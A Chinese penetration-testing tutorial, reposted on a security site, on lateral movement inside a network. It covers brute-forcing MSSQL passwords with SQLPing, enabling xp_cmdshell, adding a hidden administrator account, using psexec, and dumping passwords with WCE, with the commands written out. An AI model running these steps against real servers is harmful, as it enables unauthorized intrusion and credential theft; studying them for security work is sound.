内网及外网mssql口令扫描渗透

admin 2025年5月14日15:39:43评论0 views字数 2824阅读9分24秒阅读模式

在实际渗透过程中,往往通过SQL注入或者弱口令登录后台,成功获取了Webshell,但对于如何进行内网渗透相当纠结,其实在获取入口权限的情况下,通过lcx端口转发等工具,进入内网,可以通过数据库、系统账号等口令扫描来实施内网渗透。本文就介绍如何在内网中进行MSSQL口令扫描及获取服务器权限。

1.1使用SQLPing扫描获取mssql口令

SQLPing程序目录,配置好passlist.txtuserlist.txt文件,如图1所示,设置扫描的IP地址及其范围,本案例是针对内网开始地址192.100.100.1,终止地址为192.100.100.254。在实际渗透测试中根据实际需要来设置扫描的IP地址,User list也是根据实际掌握情况来设置,比较常用的用户为saPassword list根据实际收集的密码来进行扫描,如果是普通密码破解,则可以使用top 10000password这种字典,在内网中可以逐渐加强该字典,将收集到的所有用户密码全部加入。

内网及外网mssql口令扫描渗透

1设置SQLPing

1.2扫描并破解密码

如图2所示,对192.100.100.XC段地址进行扫描,成功发现16MSSQL实例,且暴力破解成功5个账号,红色字体表示破解成功。单击“File”菜单,可以将扫描结果保存为xml文件,然后打开文件进行查看,如图3所示。

内网及外网mssql口令扫描渗透

2MSSQL口令进行暴力破解

内网及外网mssql口令扫描渗透

3查看扫描结果

1.3使用SQLTOOLS进行提权

1)连接测试

SQL连接设置中分别填入IP地址“192.100.100.33”,密码“lo*******,如图4所示,单击连接,如果密码正确则会提示连接成功,然后执行”dir c:”命令来测试是否可以执行DOS命令。

内网及外网mssql口令扫描渗透

4执行命令失败

2)查看数据库版本

SQL命令中执行“select @@version”命令,如图5所示,获取当前数据库为SQL Server 2005.

内网及外网mssql口令扫描渗透

5获取数据库版本号

3)恢复xp_cmdshell存储过程

SQL Tools中分别执行以下语句来恢复xp_cmdshell存储过程,执行效果如图6所示。

EXEC sp_configure 'show advanced options', 1;

RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

内网及外网mssql口令扫描渗透

6恢复存储过程

4)获取当前权限

DOS命令中执行“whoami”命令获取当前用户权限为系统权限(nt authoritysystem),如图7所示。

内网及外网mssql口令扫描渗透

7获取当前用户权限为系统权限

5)添加管理员用户到管理组

DOS命令中分别执行以下语句

net user siweb$ siweb /add

net localgroup administrators siweb$ /add

net localgroup administrators

来添加用户siweb$密码为siweb,并将siweb$用户添加到管理员组,最后查看管理员组用户siweb$是否添加成功,如图8,图9,图10所示。

内网及外网mssql口令扫描渗透

8添加用户

内网及外网mssql口令扫描渗透

9添加到管理员组

内网及外网mssql口令扫描渗透

10查看管理员组用户是否添加成功

6)获取远程终端端口

远程终端默认端口是3389,有些情况下,无法直接端口进行扫描,则可以通过命令行来快速获取:

tasklist /svc | find " Term " 或者tasklist /svc | find " TermService "

显示结果如图11所示,其中7100表示进程号,TermService表示远程终端服务。

netstat -ano | find "7100"则表示获取进程号为7100的端口号,如图12所示。

内网及外网mssql口令扫描渗透

11获取TermService服务所在的进程号

内网及外网mssql口令扫描渗透

12获取远程终端端口号

7)查看当前远程终端用户登录情况

如图13所示,可以使用query user /quser等命令来查看当前3389连接情况,防止发生管理员在线情况下登入服务器!使用logoff ID注销当前登录的用户。例如注销管理员显示为唱片的用户,则可以使用“logoff 1”命令。

内网及外网mssql口令扫描渗透

13查看当前用户使用远程终端的情况

8)使用psexec配合wce来获取密码

执行net use \192.100.100.33admin$“siweb” /user:siweb$

Psexec\192.100.100.33 cmd

如图14所示,成功进行交互式命令提示符。

内网及外网mssql口令扫描渗透

14使用psexec连接服务器执行命令

9)获取当前系统架构

执行systeminfo | find "86"获取信息中会显示Family等字样,如图15所示,则表明该操作系统是X86系统,否则使用systeminfo | find "64"命令来获取该架构为X64架构,然后使用对应的wce等密码获取程序来获取明文或者加密的哈希值。

内网及外网mssql口令扫描渗透

15获取系统架构

1.4登录远程终端

使用获取的密码Administrator/!XML********登录192.100.100.33服务器,如图16所示成功获取内网中一台服务器权限。

内网及外网mssql口令扫描渗透

16成功登录远程终端

1.5总结与提高

1)口令扫描,可以通过sqlping等工具对内网IP进行扫描,获取sa口令

2)查看服务器版本,对SQL Server 2005可恢复其存储进程:

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

3)对SQL Server 2000/2005可以查看其当前用户权限,执行whomai,如果是管理员权限,则可以通过添加用户来获取服务器权限。

net user siweb$ siweb /add

net localgroup administrators siweb$ /add

net localgroup administrators

4)精确获取远程终端端口命令:

tasklist /svc | find "Term"

svchost.exe7100 TermService

netstat -ano | find "7100"

5)获取操作系统架构,便于使用合适的密码获取软件获取明文密码

systeminfo | find "86"

systeminfo | find "64"

6)明文密码获取

Wce -w

密码hash快速破解:http://www.objectif-securite.ch/en/ophcrack.php

Wce下载地址:

http://www.ampliasecurity.com/research/wce_v1_4beta_x32.zip

http://www.ampliasecurity.com/research/wce_v1_4beta_x64.zip

http://www.ampliasecurity.com/research/wce_v1_4beta_universal.zip

原文始发于微信公众号(小兵搞安全):内网及外网mssql口令扫描渗透

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月14日15:39:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网及外网mssql口令扫描渗透https://cn-sec.com/archives/4062343.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息